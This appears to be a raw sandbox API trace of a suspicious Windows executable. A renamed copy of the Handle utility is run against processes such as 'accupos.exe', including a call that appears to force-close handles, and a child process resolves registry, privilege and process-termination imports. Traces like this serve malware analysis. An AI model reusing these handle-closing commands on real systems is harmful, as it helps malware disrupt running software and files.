[0244.766] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0244.766] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x32eff0, _Radix=0 | out: _EndPtr=0x32eff0*=",6 delims=: \"") returned 3 [0244.766] wcstol (in: _String="6 delims=: \"", _EndPtr=0x32eff0, _Radix=0 | out: _EndPtr=0x32eff0*=" delims=: \"") returned 6 [0244.766] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0244.766] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0244.766] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0244.766] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0244.766] GetProcessHeap () returned 0x4f0000 [0244.766] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f0d18 | out: hHeap=0x4f0000) returned 1 [0244.767] GetProcessHeap () returned 0x4f0000 [0244.767] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe) returned 0x4f0d18 [0244.767] GetProcessHeap () returned 0x4f0000 [0244.767] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f0ce8, Size=0xe) returned 0x4f0d30 [0244.767] GetProcessHeap () returned 0x4f0000 [0244.767] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f0d30) returned 0xe [0244.767] GetProcessHeap () returned 0x4f0000 [0244.767] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f0d00, Size=0x14) returned 0x504360 [0244.767] GetProcessHeap () returned 0x4f0000 [0244.767] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x504360) returned 0x14 [0244.767] _wpopen (_Command="tdq963ii.exe -accepteula \"accupos.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0244.796] feof (_File=0x77032960) returned 0 [0244.796] ferror (_File=0x77032960) returned 0 [0244.796] GetProcessHeap () returned 0x4f0000 [0244.796] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x108) returned 0x504380 [0244.797] fgets (in: _Buf=0x504388, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0246.648] feof (_File=0x77032960) returned 0 [0246.648] ferror (_File=0x77032960) returned 0 [0246.648] GetProcessHeap () returned 0x4f0000 [0246.648] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x504380, Size=0x208) returned 0x504380 [0246.648] GetProcessHeap () returned 0x4f0000 [0246.648] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x504380) returned 0x208 [0246.648] fgets (in: _Buf=0x5043ce, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0246.648] feof (_File=0x77032960) returned 0 [0246.648] ferror (_File=0x77032960) returned 0 [0246.648] GetProcessHeap () returned 0x4f0000 [0246.649] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x504380, Size=0x308) returned 0x504380 [0246.649] GetProcessHeap () returned 0x4f0000 [0246.649] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x504380) returned 0x308 [0246.649] fgets (in: _Buf=0x5043d1, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0247.762] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0247.762] GetProcessHeap () returned 0x4f0000 [0247.762] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x504380, Size=0x9e) returned 0x504380 [0247.763] GetProcessHeap () returned 0x4f0000 [0247.763] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x504380) returned 0x9e [0247.763] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x5043d1, cbMultiByte=73, lpWideCharStr=0x504388, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0247.764] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32ece4 | out: _Buffer="\r\n") returned 2 [0247.764] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.764] GetFileType (hFile=0x7) returned 0x2 [0247.764] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.764] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32eca4 | out: lpMode=0x32eca4) returned 1 [0247.765] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.765] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32ecd0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ecd0*=0x2) returned 1 [0247.766] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0247.766] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x32ece0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0247.767] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x32ece0 | out: _Buffer=">") returned 1 [0247.767] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.767] GetFileType (hFile=0x7) returned 0x2 [0247.767] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.767] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32eca8 | out: lpMode=0x32eca8) returned 1 [0247.767] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.767] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x32ecd4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x32ecd4*=0x26) returned 1 [0247.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.768] GetFileType (hFile=0x7) returned 0x2 [0247.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.768] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32ef2c | out: lpMode=0x32ef2c) returned 1 [0247.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.768] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x32ef58, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x32ef58*=0x1) returned 1 [0247.769] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.769] GetFileType (hFile=0x7) returned 0x2 [0247.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.769] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32ef10 | out: lpMode=0x32ef10) returned 1 [0247.769] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.769] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x514b00*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x32ef3c, lpReserved=0x0 | out: lpBuffer=0x514b00*, lpNumberOfCharsWritten=0x32ef3c*=0xc) returned 1 [0247.770] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x32ef48 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0247.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.770] GetFileType (hFile=0x7) returned 0x2 [0247.770] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.770] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32ef08 | out: lpMode=0x32ef08) returned 1 [0247.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.770] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x32ef34, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ef34*=0x2c) returned 1 [0247.772] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x32ef64 | out: _Buffer=") ") returned 2 [0247.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.772] GetFileType (hFile=0x7) returned 0x2 [0247.772] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32ef24 | out: lpMode=0x32ef24) returned 1 [0247.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.773] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32ef50, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ef50*=0x2) returned 1 [0247.773] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32ef84 | out: _Buffer="\r\n") returned 2 [0247.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.773] GetFileType (hFile=0x7) returned 0x2 [0247.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.773] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32ef44 | out: lpMode=0x32ef44) returned 1 [0247.774] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.774] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32ef70, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ef70*=0x2) returned 1 [0247.775] GetConsoleTitleW (in: lpConsoleTitle=0x32ea94, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0247.776] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5022f8, lpFilePart=0x32e5b4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32e5b4*="Desktop") returned 0x25 [0247.776] SetErrorMode (uMode=0x0) returned 0x1 [0247.777] GetProcessHeap () returned 0x4f0000 [0247.777] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5022f0, Size=0x6e) returned 0x5022f0 [0247.777] GetProcessHeap () returned 0x4f0000 [0247.777] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x5022f0) returned 0x6e [0247.777] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0247.777] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0247.777] GetProcessHeap () returned 0x4f0000 [0247.777] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x120) returned 0x5046c8 [0247.777] GetProcessHeap () returned 0x4f0000 [0247.777] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x238) returned 0x5047f0 [0247.777] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0247.778] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x32e350, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e350) returned 0x5049a0 [0247.778] FindClose (in: hFindFile=0x5049a0 | out: hFindFile=0x5049a0) returned 1 [0247.778] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0247.778] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0247.778] GetConsoleTitleW (in: lpConsoleTitle=0x32e828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0247.778] InitializeProcThreadAttributeList (in: lpAttributeList=0x32e6b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32e778 | out: lpAttributeList=0x32e6b0, lpSize=0x32e778) returned 1 [0247.778] UpdateProcThreadAttribute (in: lpAttributeList=0x32e6b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x32e770, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32e6b0, lpPreviousValue=0x0) returned 1 [0247.778] GetStartupInfoW (in: lpStartupInfo=0x32e66c | out: lpStartupInfo=0x32e66c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0247.779] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0247.779] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x32e70c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32e758 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x32e758*(hProcess=0x74, hThread=0x84, dwProcessId=0x644, dwThreadId=0x150)) returned 1 [0247.800] CloseHandle (hObject=0x84) returned 1 [0247.800] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0247.800] GetProcessHeap () returned 0x4f0000 [0247.800] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505f80 | out: hHeap=0x4f0000) returned 1 [0247.800] GetEnvironmentStringsW () returned 0x504bf8* [0247.801] GetProcessHeap () returned 0x4f0000 [0247.801] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb7e) returned 0x505f80 [0247.801] FreeEnvironmentStringsW (penv=0x504bf8) returned 1 [0247.801] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) Process: id = "247" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2a8c5000" os_pid = "0x64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "239" os_parent_pid = "0x690" cmd_line = "tdq963ii.exe -accepteula \"told.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 851 os_tid = 0x38c [0234.695] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0234.696] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0234.696] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0234.696] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0234.696] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0234.696] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0234.696] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0234.696] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0234.697] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0234.697] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0234.697] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0234.697] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0234.697] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0234.698] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0234.698] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0234.698] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0234.698] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0234.698] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0234.698] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0234.698] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0234.698] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0234.699] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0234.699] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0234.699] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0234.699] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0234.699] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0234.700] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0234.700] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0234.700] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0234.700] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0234.701] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0234.701] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0234.701] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0234.701] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0234.701] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0234.701] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0234.702] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0234.702] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0234.702] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0234.702] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0234.702] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0234.702] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0234.703] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0234.703] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0234.703] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0234.703] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0234.703] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0234.703] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0234.703] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0234.704] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0234.705] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0234.706] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0234.707] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0234.708] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0234.708] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0234.708] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0234.708] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0234.708] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0234.708] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0234.708] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0234.708] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0234.708] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0234.709] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0234.709] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0234.709] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0234.709] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0234.709] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0234.709] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0234.709] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0234.709] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0234.709] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0234.709] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0234.709] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0234.709] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0234.710] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0234.710] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0234.710] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0234.710] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0234.710] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0234.710] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0234.710] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0234.710] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0234.710] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0234.710] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0234.710] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0234.710] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0234.710] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0234.711] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0234.711] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0234.711] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0234.711] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0234.711] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0234.711] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0234.712] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0234.712] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x42c97880, dwHighDateTime=0x1d68287)) [0234.712] GetCurrentThreadId () returned 0x38c [0234.712] GetCurrentProcessId () returned 0x64 [0234.712] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=35505096951) returned 1 [0234.712] GetProcessHeap () returned 0x290000 